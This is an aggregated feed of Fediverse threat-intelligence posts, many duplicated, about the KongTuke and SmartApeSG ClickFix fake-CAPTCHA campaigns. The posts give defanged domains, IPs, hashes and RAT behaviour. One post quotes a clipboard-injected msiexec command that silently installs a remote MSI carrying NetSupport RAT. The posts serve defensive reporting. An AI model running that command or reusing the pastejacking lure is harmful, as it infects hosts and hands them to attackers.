#kongtuke — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #kongtuke, aggregated by home.social.
-
#KongTuke hackers now use #Microsoft #Teams for corporate breaches
-
#KongTuke hackers now use #Microsoft #Teams for corporate breaches
-
#KongTuke hackers now use #Microsoft #Teams for corporate breaches
-
#KongTuke hackers now use #Microsoft #Teams for corporate breaches
-
#KongTuke hackers now use #Microsoft #Teams for corporate breaches
-
i've got a new malware analysis describing what i have dubbed
XorBee RAT- delivered by #kongtuke via #clickfix
- Python based
- targets domain-joined Windows
- uses port tcp/4444 for C2 traffic
- obfuscates C2 traffic with XOR of the letter
b - continuously runs a thread checking for monitoring tools and exists if seen
- after authenticating with C2, enters reverse shell
- related to ModeloRAT
- first seen in October 2025
https://rmceoin.github.io/malware-analysis/2026/04/13/xorbee-rat.html
-
2026-04-09 (Thursday): Finally got the #KongTuke CAPTCHA page and associated #ClickFix instructions today!
KongTuke CAPTCHA page traffic:
- hxxps[:]//windlrr[.]com/file.js
- hxxps[:]//windlrr[.]com/t
- hxxps[:]//windlrr[.]com/g
- hxxps[:]//windlrr[.]com/g
- hxxps[:]//windlrr[.]com/c?tk=a19806998b1234b63f73ef741e1b749dURL from clipboard-injected script:
- hxxps[:]//oeannon[.]com/t2?tk=5f7edb3752dd5b85eda86711724abd44Last URL I got on a VM (nothing returned):
- hxxps[:]//plein-soleil[.]top/o
-
2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG
Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553
Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.
-
2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG
Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553
Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.
-
NOTE: This has been updated to correct the malware names. Thanks, @netresec!
2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT
Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.
A #pcap of the infection traffic, some artifacts, and further details are available at https://www.malware-traffic-analysis.net/2026/02/02/index.html
-
NOTE: This has been updated to correct the malware names. Thanks, @netresec!
2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT
Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.
A #pcap of the infection traffic, some artifacts, and further details are available at https://www.malware-traffic-analysis.net/2026/02/02/index.html
-
NOTE: This has been updated to correct the malware names. Thanks, @netresec!
2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT
Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.
A #pcap of the infection traffic, some artifacts, and further details are available at https://www.malware-traffic-analysis.net/2026/02/02/index.html
-
NOTE: This has been updated to correct the malware names. Thanks, @netresec!
2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT
Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.
A #pcap of the infection traffic, some artifacts, and further details are available at https://www.malware-traffic-analysis.net/2026/02/02/index.html
-
NOTE: This has been updated to correct the malware names. Thanks, @netresec!
2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT
Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.
A #pcap of the infection traffic, some artifacts, and further details are available at https://www.malware-traffic-analysis.net/2026/02/02/index.html
-
📣 🚨 #KongTuke hacker group cloned a #Chrome ad blocker to trick users into installing spyware which also launched DoS attacks, crashed browsers, and dropped ModeloRAT.
Read: https://hackread.com/clickfix-crashfix-kongtuke-fake-chrome-ad-blocker-modelorat/
-
📣 🚨 #KongTuke hacker group cloned a #Chrome ad blocker to trick users into installing spyware which also launched DoS attacks, crashed browsers, and dropped ModeloRAT.
Read: https://hackread.com/clickfix-crashfix-kongtuke-fake-chrome-ad-blocker-modelorat/
-
📣 🚨 #KongTuke hacker group cloned a #Chrome ad blocker to trick users into installing spyware which also launched DoS attacks, crashed browsers, and dropped ModeloRAT.
Read: https://hackread.com/clickfix-crashfix-kongtuke-fake-chrome-ad-blocker-modelorat/
-
📣 🚨 #KongTuke hacker group cloned a #Chrome ad blocker to trick users into installing spyware which also launched DoS attacks, crashed browsers, and dropped ModeloRAT.
Read: https://hackread.com/clickfix-crashfix-kongtuke-fake-chrome-ad-blocker-modelorat/
-
📣 🚨 #KongTuke hacker group cloned a #Chrome ad blocker to trick users into installing spyware which also launched DoS attacks, crashed browsers, and dropped ModeloRAT.
Read: https://hackread.com/clickfix-crashfix-kongtuke-fake-chrome-ad-blocker-modelorat/
-
2026-01-08 (Thursday): Got a full infection from #KongTuke campaign #ClickFix activity today.
I split the traffic from this infection into two #pcap files, and the second one is over 200 MB, because of the malware download.
Pcap files, the associated malware, artifacts, and further information is available at https://www.malware-traffic-analysis.net/2026/01/08/index.html
-
I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html
I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.
I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.
Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.
It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.
-
I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html
I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.
I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.
Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.
It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.
-
I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html
I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.
I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.
Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.
It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.
-
I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html
I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.
I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.
Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.
It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.
I never got any further than the HTTP POST request that sends information about the infected system host.
Details at: https://github.com/malware-traffic/indicators/blob/main/2025-08-20-IOCs-for-Kongtuke-activity.txt
-
2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.
I never got any further than the HTTP POST request that sends information about the infected system host.
Details at: https://github.com/malware-traffic/indicators/blob/main/2025-08-20-IOCs-for-Kongtuke-activity.txt
-
2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.
I never got any further than the HTTP POST request that sends information about the infected system host.
Details at: https://github.com/malware-traffic/indicators/blob/main/2025-08-20-IOCs-for-Kongtuke-activity.txt
-
2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.
I never got any further than the HTTP POST request that sends information about the infected system host.
Details at: https://github.com/malware-traffic/indicators/blob/main/2025-08-20-IOCs-for-Kongtuke-activity.txt
-
2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.
I never got any further than the HTTP POST request that sends information about the infected system host.
Details at: https://github.com/malware-traffic/indicators/blob/main/2025-08-20-IOCs-for-Kongtuke-activity.txt
-
Example 2: #FileFix
As of 2025-07-03, the #KongTuke campaign is using FileFix style #ClickFix pages to distribute whatever this campaign is distributing.
It's likely pushing #InterlockRAT based on previous discussions I've had here, but I couldn't confirm, because it didn't like me.
-
Example 2: #FileFix
As of 2025-07-03, the #KongTuke campaign is using FileFix style #ClickFix pages to distribute whatever this campaign is distributing.
It's likely pushing #InterlockRAT based on previous discussions I've had here, but I couldn't confirm, because it didn't like me.
-
Social media post I wrote for my employer on other platforms.
2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at
Information from an infection run earlier today at https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt
Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:
-
Social media post I wrote for my employer on other platforms.
2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at
Information from an infection run earlier today at https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt
Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:
-
Social media post I wrote for my employer on other platforms.
2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at
Information from an infection run earlier today at https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt
Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:
-
Social media post I wrote for my employer on other platforms.
2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at
Information from an infection run earlier today at https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt
Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:
-
Social media post I wrote for my employer on other platforms.
2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at
Information from an infection run earlier today at https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt
Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:
-
025-01-28 (Tuesday): A case of web injects--malicious script injected into compromised websites. In this example, a compromised site has two instances of injected script.
One inject script is #KongTuke that leads to a fake CAPTCHA page, which is something that I and many others have discussed previously.
The other injected script leads to a #SocGholish style fake browser update page.
For a#pcap of the infection traffic, malware and other files from the activity, and the indicators of compromise (IOCs), see https://www.malware-traffic-analysis.net/2025/01/28/index.html